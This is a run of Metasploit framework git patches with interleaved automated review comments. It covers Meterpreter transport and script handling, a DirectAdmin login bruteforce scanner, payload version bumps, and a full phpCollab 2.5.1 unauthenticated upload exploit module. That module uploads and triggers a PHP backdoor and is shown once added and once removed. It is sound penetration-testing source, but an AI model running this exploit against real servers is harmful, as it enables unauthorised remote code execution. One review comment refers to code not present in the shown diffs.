'Nick Marcoccio "1oopho1e" remembermodems[at]gmail.com' ], + 'Author' => [ 'Nick Marcoccio "1oopho1e" ' ], 'License' => MSF_LICENSE, 'DefaultOptions' => { From 15da7c699db5bfe5312970dac2f1ad90f9084d96 Mon Sep 17 00:00:00 2001 From: Tim Date: Fri, 20 Oct 2017 17:54:38 +0800 Subject: [PATCH 23/37] Fix #7779, fix multi/meterpreter/reverse_http with web_delivery --- lib/msf/core/payload/windows/reverse_http.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index db89b7138d..976b9c4358 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb 
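Review bot: generate's guard `if sh.length >= 16` counts characters rather than bytes, so a SHELL value containing multibyte characters passes the check and `p[136, sh.length] = sh` then replaces fewer bytes than it inserts, growing the payload past the 16-byte zero-filled buffer at offset 136 and shifting everything after it; use `sh.bytesize` in both the comparison and the slice. The check also accepts an empty SHELL, which leaves the buffer all zero and hands execve an empty path, so `raise ArgumentError, "SHELL must not be empty" if sh.empty?` belongs next to it. The literal 136 and the 16-byte limit are the `shell:` buffer from single_reverse_tcp_shell.s; a comment naming that source, e.g. `# 16-byte NUL-terminated shell buffer at the end of the stub, see single_reverse_tcp_shell.s`, ties them to the Offsets table above. `include Msf::Payload::Linux` on an Apple iOS payload looks inherited from the Linux template; if nothing from that mixin is used here it should be dropped.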
+++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -128,7 +128,7 @@ module Payload::Windows::ReverseHttp # Generate the URI for the initial stager # def generate_small_uri - generate_uri_uuid_mode(:init_native, 5) + generate_uri_uuid_mode(:init_native, 30) end # From a4098803b3029cbea7376d7b315f92a1072661be Mon Sep 17 00:00:00 2001 From: EgiX Date: Wed, 20 Dec 2017 13:10:42 +0100 Subject: [PATCH 24/37] Remove OSVDB reference --- modules/exploits/unix/webapp/tuleap_unserialize_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb index e320e173ec..3cde39df36 100644 --- a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb @@ -25,7 +25,6 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['CVE', '2014-8791'], - ['OSVDB', '115128'], ['URL', 'http://karmainsecurity.com/KIS-2014-13'], ['URL', 'https://tuleap.net/plugins/tracker/?aid=7601'] ], From 05c6079e0d3c10a1b2a298a294df2d9276852f4d Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 20 Dec 2017 06:15:09 -0600 Subject: [PATCH 25/37] remove unused 'active_resource' accessor --- lib/msf/ui/console/driver.rb | 8 -------- 1 file changed, 8 deletions(-) diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index fd53c3278b..46c5caad95 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -313,8 +313,6 @@ class Driver < Msf::Ui::Driver return end - self.active_resource = resource_file - # Process ERB directives first print_status "Processing #{path} for ERB directives." erb = ERB.new(resource_file) @@ -362,8 +360,6 @@ class Driver < Msf::Ui::Driver run_single(line) end end - - self.active_resource = nil end # 
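Review bot: generate_small_uri now passes 30 instead of 5 to generate_uri_uuid_mode with no comment explaining the choice; the commit message ties it to #7779 and web_delivery, but the next reader of the method sees only a bare number. A one-line comment above the call, e.g. `# 30-char URI: the shorter 5-char form broke multi/meterpreter/reverse_http under web_delivery (#7779)`, keeps that reasoning in the code. If the same length is assumed by the stager or handler side, a named constant shared between them would be safer than two literals that must stay in agreement.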
@@ -507,10 +503,6 @@ class Driver < Msf::Ui::Driver # The active session associated with the driver. # attr_accessor :active_session - # - # The active resource file being processed by the driver - # - attr_accessor :active_resource def stop framework.events.on_ui_stop() From 5ecc45a0d18f7c2fdb6798c95e6f72c9be88f380 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 20 Dec 2017 06:42:50 -0600 Subject: [PATCH 26/37] nicely handle exceptions when processing scripts, tell the user about them Let's help the user by saying what's going on. --- lib/msf/base/sessions/scriptable.rb | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/msf/base/sessions/scriptable.rb b/lib/msf/base/sessions/scriptable.rb index 87a44c031f..7c0b1e3798 100644 --- a/lib/msf/base/sessions/scriptable.rb +++ b/lib/msf/base/sessions/scriptable.rb @@ -164,13 +164,17 @@ module Scriptable else full_path = self.class.find_script_path(script_name) - # No path found? Weak. if full_path.nil? print_error("The specified script could not be found: #{script_name}") - return true + return + end + + begin + execute_file(full_path, args) + framework.events.on_session_script_run(self, full_path) + rescue StandardError => e + print_error("Could not execute #{script_name}: #{e.class} #{e}") end - framework.events.on_session_script_run(self, full_path) - execute_file(full_path, args) end end From 2629ec6bdbdc6d5853827fcfdade0bac1ce4143e Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 20 Dec 2017 06:43:20 -0600 Subject: [PATCH 27/37] infer whether the user supplied a Meterpreter or resource script --- lib/msf/base/sessions/meterpreter.rb | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index f75c9e8d53..85aa3a4d8e 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb 
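Review bot: The new `rescue StandardError => e` encloses `framework.events.on_session_script_run(self, full_path)` as well as `execute_file(full_path, args)`, so an exception raised by an event subscriber is reported as "Could not execute <script>" even though the script itself finished; moving the event call after the begin/rescue block attributes failures to the right party. The handler prints only `e.class` and `e.message` and discards the backtrace, which is the one piece needed to locate a failure inside a script; logging it through the framework's logging helpers at debug level keeps the console line short without losing it. `return true` also became a bare `return`, so the not-found path now yields nil — fine if no caller inspects the value, but the enclosing method begins outside the hunk so I cannot confirm.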
@@ -302,11 +302,18 @@ class Meterpreter < Rex::Post::Meterpreter::Client ## # :category: Msf::Session::Scriptable implementors # - # Runs the meterpreter script in the context of a script container + # Runs the Meterpreter script or resource file # def execute_file(full_path, args) - o = Rex::Script::Meterpreter.new(self, full_path) - o.run(args) + # Infer a Meterpreter script by it either having the .rb extension, or it + # containing a reference to the client object. This is for backward + # compatibility, since the API is not explicit to the user whether this + # should be a resource file or a Meterpreter script. + if File.extname(full_path) == ".rb" || File.read(full_path).match?(/\s*client\/./) + Rex::Script::Meterpreter.new(self, full_path).run(args) + else + console.load_resource(full_path) + end end From fd2a0d3057980161bb531fff22b4a940bc11c2ca Mon Sep 17 00:00:00 2001 From: Nick Marcoccio Date: Wed, 20 Dec 2017 08:22:01 -0500 Subject: [PATCH 28/37] Add phpCollab 2.5.1 exploit module --- .../unix/webapp/phpcollab_upload_exec.rb | 92 +++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 modules/exploits/unix/webapp/phpcollab_upload_exec.rb diff --git a/modules/exploits/unix/webapp/phpcollab_upload_exec.rb b/modules/exploits/unix/webapp/phpcollab_upload_exec.rb new file mode 100644 index 0000000000..75c7d60126 --- /dev/null +++ b/modules/exploits/unix/webapp/phpcollab_upload_exec.rb 
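Review bot: The detection regex `/\s*client\/./` matches the literal text `client/` followed by any character, not a method call on the client object, so the comment's "a reference to the client object" is not what the code tests; `client\.` is presumably intended, and the later "fix incorrect regex" commit in this series appears to address it, so confirm both land together. The leading `\s*` contributes nothing to an unanchored match, and `File.read(full_path)` loads the entire file only to classify it; `File.foreach(full_path).any? { |line| line.match?(/\bclient\./) }` stops at the first hit. Because the check runs before the file is interpreted, a resource file that merely mentions `client.` in a comment will be run as a Meterpreter script; that consequence is worth a sentence in the comment since users are told the API is not explicit about the type.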
@@ -0,0 +1,92 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'phpCollab 2.5.1 Unauthenticated File Upload Vulnerability', + 'Description' => %q{ + This module exploits a file upload vulnerability in phpCollab 2.5.1 + which could be abused to allow unauthenticated users to execute arbitrary code + under the context of the web server user. + + The exploit has been tested on Ubuntu 16.04.3 64-bit + }, + 'Author' => + [ + 'Nicolas SERRA ' # Vulnerability discovery + 'Nick Marcoccio "1oopho1e" ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://www.exploit-db.com/exploits/42934/' ], + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Payload' => + { + 'DisableNops' => true + }, + 'Targets' => [ ['Automatic', {}] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Sep 29 2017' + )) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"]) + ]) + end + + def check + url = normalize_uri(target_uri.path, "general/login.php?msg=logout") + res = send_request_cgi( + 'method' => 'GET', + 'uri' => url + ) + + if res && res.body.include?('PhpCollab v2.5.1') + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def exploit + filename = '1.php' + register_file_for_cleanup(filename) + + data = Rex::MIME::Message.new + data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload\"; filename=\"#(unknown)\"") + + print_status("Uploading backdoor file: #(unknown)") + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 
"clients/editclient.php?id=1&action=update"), + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data.to_s + }) + + if res && res.code == 302 + print_good("Backdoor successfully created.") + else + fail_with(Failure::Unknown, "#{peer} - Error on uploading file") + end + + print_status("Trigging the exploit...") + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "logos_clients/1.php") + }, 5) + end +end From fe15ac3b82fbd24bfd9839e2178435a516cecd71 Mon Sep 17 00:00:00 2001 From: Nick Marcoccio Date: Wed, 20 Dec 2017 08:27:18 -0500 Subject: [PATCH 29/37] Removed file committed by mistake --- .../unix/webapp/phpcollab_upload_exec.rb | 92 ------------------- 1 file changed, 92 deletions(-) delete mode 100644 modules/exploits/unix/webapp/phpcollab_upload_exec.rb diff --git a/modules/exploits/unix/webapp/phpcollab_upload_exec.rb b/modules/exploits/unix/webapp/phpcollab_upload_exec.rb deleted file mode 100644 index 75c7d60126..0000000000 --- a/modules/exploits/unix/webapp/phpcollab_upload_exec.rb +++ /dev/null 
@@ -1,92 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::FileDropper - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'phpCollab 2.5.1 Unauthenticated File Upload Vulnerability', - 'Description' => %q{ - This module exploits a file upload vulnerability in phpCollab 2.5.1 - which could be abused to allow unauthenticated users to execute arbitrary code - under the context of the web server user. - - The exploit has been tested on Ubuntu 16.04.3 64-bit - }, - 'Author' => - [ - 'Nicolas SERRA ' # Vulnerability discovery - 'Nick Marcoccio "1oopho1e" ' # Metasploit module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://www.exploit-db.com/exploits/42934/' ], - ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Payload' => - { - 'DisableNops' => true - }, - 'Targets' => [ ['Automatic', {}] ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Sep 29 2017' - )) - - register_options( - [ - OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"]) - ]) - end - - def check - url = normalize_uri(target_uri.path, "general/login.php?msg=logout") - res = send_request_cgi( - 'method' => 'GET', - 'uri' => url - ) - - if res && res.body.include?('PhpCollab v2.5.1') - return Exploit::CheckCode::Appears - end - - return Exploit::CheckCode::Safe - end - - def exploit - filename = '1.php' - register_file_for_cleanup(filename) - - data = Rex::MIME::Message.new - data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload\"; filename=\"#(unknown)\"") - - print_status("Uploading backdoor file: #(unknown)") - - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 
"clients/editclient.php?id=1&action=update"), - 'ctype' => "multipart/form-data; boundary=#{data.bound}", - 'data' => data.to_s - }) - - if res && res.code == 302 - print_good("Backdoor successfully created.") - else - fail_with(Failure::Unknown, "#{peer} - Error on uploading file") - end - - print_status("Trigging the exploit...") - send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "logos_clients/1.php") - }, 5) - end -end From bfa0cad8a5bbb0bddee9af014f8375e8a806d718 Mon Sep 17 00:00:00 2001 From: Puru Date: Wed, 20 Dec 2017 20:49:36 +0545 Subject: [PATCH 30/37] Fix clipboard typo --- .../ui/console/command_dispatcher/extapi/clipboard.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb index 547ff2138f..511afb7489 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb @@ -27,7 +27,7 @@ class Console::CommandDispatcher::Extapi::Clipboard "clipboard_monitor_pause" => "Pause the active clipboard monitor", "clipboard_monitor_resume" => "Resume the paused clipboard monitor", "clipboard_monitor_dump" => "Dump all captured clipboard content", - "clipboard_monitor_purge" => "Delete all captured cilpboard content without dumping it", + "clipboard_monitor_purge" => "Delete all captured clipboard content without dumping it", "clipboard_monitor_stop" => "Stop the clipboard monitor" } reqs = { From 0c867d92fd9f55421d2f908bcc975c02e8550257 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 20 Dec 2017 11:46:14 -0600 Subject: [PATCH 31/37] fix incorrect regex --- lib/msf/base/sessions/meterpreter.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 85aa3a4d8e..6c4e12c488 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -309,7 +309,7 @@ class Meterpreter < Rex::Post::Meterpreter::Client # containing a reference to the client object. This is for backward # compatibility, since the API is not explicit to the user whether this # should be a resource file or a Meterpreter script. - if File.extname(full_path) == ".rb" || File.read(full_path).match?(/\s*client\/./) + if File.extname(full_path) == ".rb" || File.read(full_path).match?(/\s*client\./) Rex::Script::Meterpreter.new(self, full_path).run(args) else console.load_resource(full_path) From 3339c3b74d2091a33f96853621b8b045c1243e56 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 20 Dec 2017 11:49:42 -0600 Subject: [PATCH 32/37] remove magic, because it causes complications with complex RC scripts --- lib/msf/base/sessions/meterpreter.rb | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 6c4e12c488..5368d25003 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -305,11 +305,8 @@ class Meterpreter < Rex::Post::Meterpreter::Client # Runs the Meterpreter script or resource file # def execute_file(full_path, args) - # Infer a Meterpreter script by it either having the .rb extension, or it - # containing a reference to the client object. This is for backward - # compatibility, since the API is not explicit to the user whether this - # should be a resource file or a Meterpreter script. - if File.extname(full_path) == ".rb" || File.read(full_path).match?(/\s*client\./) + # Infer a Meterpreter script by it having an .rb extension + if File.extname(full_path) == ".rb" Rex::Script::Meterpreter.new(self, full_path).run(args) else console.load_resource(full_path) 
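Review bot: The new dispatch `if File.extname(full_path) == ".rb"` is a case-sensitive comparison, so a script saved as `foo.RB` (easy to end up with on case-insensitive Windows or macOS filesystems) falls through to `console.load_resource` and is parsed as msfconsole commands instead of run as Ruby; `if File.extname(full_path).casecmp('.rb').zero?` keeps the intent and tolerates case. Because the content sniff is gone, a resource file that previously executed as a Meterpreter script only because it mentioned `client.` will now be silently treated as a resource script, which is a user-visible behavior change; the doc comment on `execute_file` should say so, e.g. `# The file extension alone decides: ".rb" runs as a Meterpreter script, anything else is loaded as a resource file.` The body of `execute_file` continues past the end of this hunk.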
From 9719ede3f011ddb48e0d71a864b3631de32c8f95 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 20 Dec 2017 13:12:24 -0600 Subject: [PATCH 33/37] restore transport enum used in TLVs --- lib/rex/post/meterpreter/client_core.rb | 22 +++++++++++-------- .../ui/console/command_dispatcher/core.rb | 2 +- 2 files changed, 14 insertions(+), 10 deletions(-) diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index b1d001013e..949445e6ee 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -34,12 +34,16 @@ module Meterpreter ### class ClientCore < Extension - VALID_TRANSPORTS = [ - 'reverse_tcp', - 'reverse_http', - 'reverse_https', - 'bind_tcp' - ] + METERPRETER_TRANSPORT_TCP = 0 + METERPRETER_TRANSPORT_HTTP = 1 + METERPRETER_TRANSPORT_HTTPS = 2 + + VALID_TRANSPORTS = { + 'reverse_tcp' => METERPRETER_TRANSPORT_TCP, + 'reverse_http' => METERPRETER_TRANSPORT_HTTP, + 'reverse_https' => METERPRETER_TRANSPORT_HTTPS, + 'bind_tcp' => METERPRETER_TRANSPORT_TCP + } include Rex::Payloads::Meterpreter::UriChecksum @@ -721,7 +725,7 @@ class ClientCore < Extension # def valid_transport?(transport) return false if transport.nil? - VALID_TRANSPORTS.include?(transport.downcase) + VALID_TRANSPORTS.has_key?(transport.downcase) end # @@ -875,7 +879,7 @@ private opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua]) - if transport == 'reverse_https' && opts[:cert] + if transport == 'reverse_https' && opts[:cert] # currently only https transport offers ssl hash = Rex::Socket::X509Certificate.get_cert_file_hash(opts[:cert]) request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash) end @@ -896,7 +900,7 @@ private end - request.add_tlv(TLV_TYPE_TRANS_TYPE, transport) + request.add_tlv(TLV_TYPE_TRANS_TYPE, VALID_TRANSPORTS[transport]) request.add_tlv(TLV_TYPE_TRANS_URL, url) request 
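Review bot: `valid_transport?` accepts the name case-insensitively through `VALID_TRANSPORTS.has_key?(transport.downcase)`, but the new `request.add_tlv(TLV_TYPE_TRANS_TYPE, VALID_TRANSPORTS[transport])` in the last hunk looks up the raw string, so a value such as `Reverse_HTTPS` that passed validation would resolve to `nil` here and a nil-valued TLV would be sent to the payload (unless the caller normalizes the string before this private method, which the diff does not show). Use `VALID_TRANSPORTS.fetch(transport.downcase)` so a mismatch raises locally instead of producing a malformed transport request; the `transport == 'reverse_https'` comparison in the previous hunk has the same case sensitivity. The three `METERPRETER_TRANSPORT_*` integers and the hash are wire-protocol identifiers that presumably mirror values compiled into the payload side, so freeze the table (`}.freeze`) and record the contract in a comment, e.g. `# Values are the transport enum the payload expects in TLV_TYPE_TRANS_TYPE; keep in sync with the Meterpreter implementations.`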
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index cd81a03b10..4037415edd 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -758,7 +758,7 @@ class Console::CommandDispatcher::Core # Arguments for transport switching # @@transport_opts = Rex::Parser::Arguments.new( - '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.join(', ')}"], + '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.keys.join(', ')}"], '-l' => [true, 'LHOST parameter (for reverse transports)'], '-p' => [true, 'LPORT parameter'], '-i' => [true, 'Specify transport by index (currently supported: remove)'], From 7f8a5d38346fd33db1623414bf6b6cb83fedd9e9 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 20 Dec 2017 15:09:11 -0600 Subject: [PATCH 34/37] improved credential reporting --- .../framework/login_scanner/directadmin.rb | 12 ++--- .../scanner/http/directadmin_login.rb | 54 +++---------------- 2 files changed, 13 insertions(+), 53 deletions(-) diff --git a/lib/metasploit/framework/login_scanner/directadmin.rb b/lib/metasploit/framework/login_scanner/directadmin.rb index f654676d0c..87d6f87513 100644 --- a/lib/metasploit/framework/login_scanner/directadmin.rb +++ b/lib/metasploit/framework/login_scanner/directadmin.rb @@ -8,7 +8,6 @@ module Metasploit DEFAULT_PORT = 443 PRIVATE_TYPES = [ :password ] - LOGIN_STATUS = Metasploit::Model::Login::Status # Shorter name # Checks if the target is Direct Admin Web Control Panel. The login module should call this. @@ -73,7 +72,7 @@ module Metasploit }) unless res - return {:status => LOGIN_STATUS::UNABLE_TO_CONNECT, :proof => res.to_s} + return {:status => Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, :proof => res.to_s} end # After login, the application should give us a new SID 
@@ -82,10 +81,10 @@ module Metasploit @last_sid = sid # Update our SID if res.headers['Location'].to_s.include?('/') && !sid.blank? - return {:status => LOGIN_STATUS::SUCCESSFUL, :proof => res.to_s} + return {:status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.to_s} end - {:status => LOGIN_STATUS::INCORRECT, :proof => res.to_s} + {:status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.to_s} end @@ -100,14 +99,15 @@ module Metasploit proof: nil, host: host, port: port, - protocol: 'tcp' + protocol: 'tcp', + service_name: ssl ? 'https' : 'http' } begin result_opts.merge!(get_login_state(credential.public, credential.private)) rescue ::Rex::ConnectionError => e # Something went wrong during login. 'e' knows what's up. - result_opts.merge!(status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: e.message) + result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e.message) end Result.new(result_opts) diff --git a/modules/auxiliary/scanner/http/directadmin_login.rb b/modules/auxiliary/scanner/http/directadmin_login.rb index a5efe92039..b57b63af36 100644 --- a/modules/auxiliary/scanner/http/directadmin_login.rb +++ b/modules/auxiliary/scanner/http/directadmin_login.rb 
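Review bot: Every result returned from `get_login_state` carries `:proof => res.to_s`, and on the success path the surrounding context shows the response is the one from which the new session id is extracted (`@last_sid = sid`), so the full response, presumably including the `Set-Cookie` header with a live session identifier, is persisted to the credential store as proof. Storing a reusable session token alongside the credential widens what a database compromise yields; a narrower proof such as `:proof => res.headers['Location']` or the status line would still document the redirect that drives the success decision. The `service_name: ssl ? 'https' : 'http'` addition in the last hunk is the right fix for the previously hard-coded `'http'`, but the success heuristic itself, any `Location` containing `/` plus a non-blank SID, is context rather than new code and is left as is. The `get_login_state` body starts before this hunk.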
@@ -61,63 +61,23 @@ class MetasploitModule < Msf::Auxiliary }.call end - - def report_good_cred(ip, port, result) - service_data = { - address: ip, - port: port, - service_name: 'http', - protocol: 'tcp', - workspace_id: myworkspace_id - } - - credential_data = { - module_fullname: self.fullname, - origin_type: :service, - private_data: result.credential.private, - private_type: :password, - username: result.credential.public, - }.merge(service_data) - - login_data = { - core: create_credential(credential_data), - last_attempted_at: DateTime.now, - status: result.status, - proof: result.proof - }.merge(service_data) - - create_credential_login(login_data) - end - - - def report_bad_cred(ip, rport, result) - invalidate_login( - address: ip, - port: rport, - protocol: 'tcp', - public: result.credential.public, - private: result.credential.private, - realm_key: result.credential.realm_key, - realm_value: result.credential.realm, - status: result.status, - proof: result.proof - ) - end - - # Attempts to login def bruteforce(ip) scanner(ip).scan! do |result| + credential_data = result.to_h.merge({ + workspace_id: myworkspace_id, + module_fullname: self.fullname, + }) case result.status when Metasploit::Model::Login::Status::SUCCESSFUL print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'") - report_good_cred(ip, rport, result) + create_credential_and_login(credential_data) when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT vprint_brute(:level => :verror, :ip => ip, :msg => result.proof) - report_bad_cred(ip, rport, result) + invalidate_login(credential_data) when Metasploit::Model::Login::Status::INCORRECT vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'") - report_bad_cred(ip, rport, result) + invalidate_login(credential_data) end end end From df4f62cde93673cbce3cbceab8fb30ee490f9c39 Mon Sep 17 00:00:00 2001 
From: Brent Cook Date: Wed, 20 Dec 2017 15:58:17 -0600 Subject: [PATCH 35/37] bump to mettle 0.3.3 --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- .../singles/apple_ios/aarch64/meterpreter_reverse_http.rb | 2 ++ .../singles/apple_ios/aarch64/meterpreter_reverse_https.rb | 2 ++ .../singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb | 2 ++ .../singles/linux/aarch64/meterpreter_reverse_http.rb | 2 +- .../singles/linux/aarch64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_http.rb | 2 +- .../singles/linux/mips64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../singles/linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_http.rb | 2 +- .../singles/linux/mipsle/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/ppc/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/ppc/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb | 2 +- .../singles/linux/ppc64le/meterpreter_reverse_http.rb | 2 +- .../singles/linux/ppc64le/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb | 2 +- .../singles/linux/ppce500v2/meterpreter_reverse_http.rb 
| 2 +- .../singles/linux/ppce500v2/meterpreter_reverse_https.rb | 2 +- .../singles/linux/ppce500v2/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/x64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/x64/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/x86/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/x86/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb | 2 +- 44 files changed, 48 insertions(+), 42 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index e7564cd7b6..5e29273834 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -19,7 +19,7 @@ PATH metasploit-model metasploit-payloads (= 1.3.20) metasploit_data_models - metasploit_payloads-mettle (= 0.3.2) + metasploit_payloads-mettle (= 0.3.3) msgpack nessus_rest net-ssh @@ -188,7 +188,7 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.3.2) + metasploit_payloads-mettle (0.3.3) method_source (0.9.0) mini_portile2 (2.3.0) minitest (5.10.3) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index f8d00102a7..028945b2b9 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec 
